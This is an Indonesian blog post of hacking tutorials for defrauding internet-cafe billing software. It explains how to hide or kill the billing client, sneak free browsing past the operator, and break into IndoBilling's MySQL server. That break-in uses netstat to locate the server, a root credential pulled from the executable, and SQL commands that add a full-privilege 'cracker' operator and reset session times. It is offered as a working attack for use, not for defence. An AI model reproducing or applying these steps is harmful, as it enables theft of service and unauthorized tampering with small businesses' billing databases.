15 Okt 2010

cara menghack Billing warnet

bahan2 harus disiapkan:
1. Program ZHider. download diSini
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+X untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Cara 2:
Nyalain kompi .Setelah loading windows tekan tahan Ctrl+Alt+Del sebelum keluar jendela billing(harus cepet coz jendela billing muncul hanya 2 detik setelah loading windows). Setelah kluar task manager klik [ End Task ] pada aplikasi [ client 008 ].
Cara 3:
Menggunakan software Billing Hack(bisa download di www.vb-bego.com). Software ini bahkan bisa mereset time billing.
Bisa juga sebelum nyalain kompi cabut kabel LAN di belakang CPU. Biar gak terlalu mencurigakan, cabut kabelnya sambil pura-pura pasang USB ato Flash Disk (sambil nyelam mancing ikan gitu deh pepatahnya).Trus nyalain kompi tunggu sampai jendela billing keluar. Klik Admin masukkan password default008. Trus di Exit Client&Password masukkan juga password 008. Abis tu, setelah muncul kotak yang terakhir cari tanda ****** yang letaknya paling bawah kiri, delet tanda tsb dan terakhir klik Exit Client yang terletak di sebelah kanan tanda yang telah kita hapus tadi. Jadi deh….
Kalo semua cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhoi Tuhan Kalo ketahuan langsung pertebal [muka bego-mu]. Misalnya bilang… Eh, kok jadi gini ya? Kemaren ga gini kok. Ato kata-kata lain, tergantung kreatifitas kamu.













HAck IndoBilling
Indobilling?? yups.. sebuah billing warnet yang dibuat oleh anak asli Indonesia, walaupun dibuat oleh bangsa sendiri tetapi hal itu rupanya tidak berlaku untuk tangan2 jail. Pada kesempatan kali ini kita akan belajar bagaimana menghack sebuah indobilling. Tutorial ini bukanlah buatanku melainkan buatan saudaraku setanah air invisible_theater
[x] Apa itu indobilling ??
yaahhh… semacam aplikasi billing untuk warnet. mbolehin kita untuk make komputer abis kita login ke billing server alias komp OP.
Ngerti bahasne po ora dab ???? pokok e kaya gt lah …
[x] Trus permasalahanya apa ???
sebenernya ga rumit2x amat sih mslh nya, cm koneksi nya ke database yang
ngga ke-filter.
[x] Trus untungnya apa cb kl mbaca blog mu sampe abis ???
ya macem-macem. nubah nama warnet nya, alamat warnet nya,
registrasi warnet nya, nama OP nya, bahkan mbuat km bs ngenet
dengan gratis. (yg terakhir jgn dilakuin ya … d0s4 !! kan rejekinya udh ada
sendiri-sendiri)
[x] Emang caranya gmn c ???
manfaatin aj SQL Manager. eg. SQLyog.
[x] Trus user name sama passwordnya apa ??? kan butuh itu biar bs konek.
Tar deh gmpng.
[x] IP nya tau dr mn ??
ya liat aja pake netstat.
[x] Oww … gt ya … menarik jg nih. Jelasin dong !!!
kay …. pertama kali kita mesti tau IP nya server. dr mn kita tau ???
pake netstat aj.
caranya ::
buat file “netstat.bat” yang isinya berikut ini
============== NETSTAT.BAT ============= [don't copy paste this line]
netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don't copy paste this line]
fungsi dari perintah ini adalah mencetak hasil dari “netstat” ke dalam sebuah file netstat.txt lalu membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.
contoh ::
========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================
keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.
Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet disini http://www.webyog.com/downloads/SQLyog604.exe
/*mlm ni masih lumayan ad temennya, nge-blog bareng ‘eross fyuuhhh … tetep ngantuk jg. (cukup ..kelamaan banget kata sambutan nya !!! ini bukan upacara bendera bung !! )*/
kemaren udh sampe di bahasan “mengetahui IP Billing Server”, sekarang mulai untuk konek ke DB mySQL nya server.
yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server, yang msh jd pertanyaan adalah “password & username” nya apa ???
==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================
[x]nah lo … tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit nya ???
yaahh… sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya …
hmmm…. udh deh, kunci udh ditangan, tinggal eksekusi aj.
[x]eksekusi dari hongkong !!!! jelasin dong caranya !!!!!!
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja. kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa ngubah semua hal yang berhubungan dengan indobilling pada table “warnet”.
misalnya kita pengen nambahin operator di billing server dengan username “cracker” dan password “cracker” yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa dengan menjalankan SQL command berikut ini :
============================================= [don't copy paste this line]
insert into operator (op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values (22,’cracker’,password(’cracker’),’intruder’,'true’,'true’,'true’,'true’,'true’,'true’,'true’,'Y’,'Y’,'Y’,'Y’,'Y’,'Y’,'Y’)
============================================= [don't copy paste this line]
nahhh …. gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = ‘yyyy-mm-dd hh:mm:ss’
-> format st_name = ‘nama username’
-> st_id = ‘nomor KBU’
yang perlu diinget adalah nilai “st_start” harus waktu saat pengupdatean DB dilakuin. bisa juga dengan make fungsi SQL yaitu curdate() dan curdate().
============================================= [don't copy paste this line]
update station set st_start=’2007-07-01 20:30:30′,st_name=’invisible_theater’, st_duration=’00:01:00′ where st_id=’1′
============================================= [don't copy paste this line]
dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.
============================================= [don't copy paste this line]
update station set st_start=concat(curdate(),’ ‘,curtime()),st_name=’invisible_theater’, st_duration=’00:01:00′ where st_id=’1′
============================================= [don't copy paste this line]
kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh implementasi aj dab.
[x]hmmm…. boleh-boleh ………. trus kq bisa ya ??? ada apa c sebenernya??
yahhh sebenernya cm masalah setting doang, IP address yang bukan localhost diperbolehkan untuk connect langsung ke database dan melakukan edit. too simple right ?
kira-kira gitu deh … silakan di uprek sendiri dengan kreatifitas sendiri ya …
Posted by
Labels: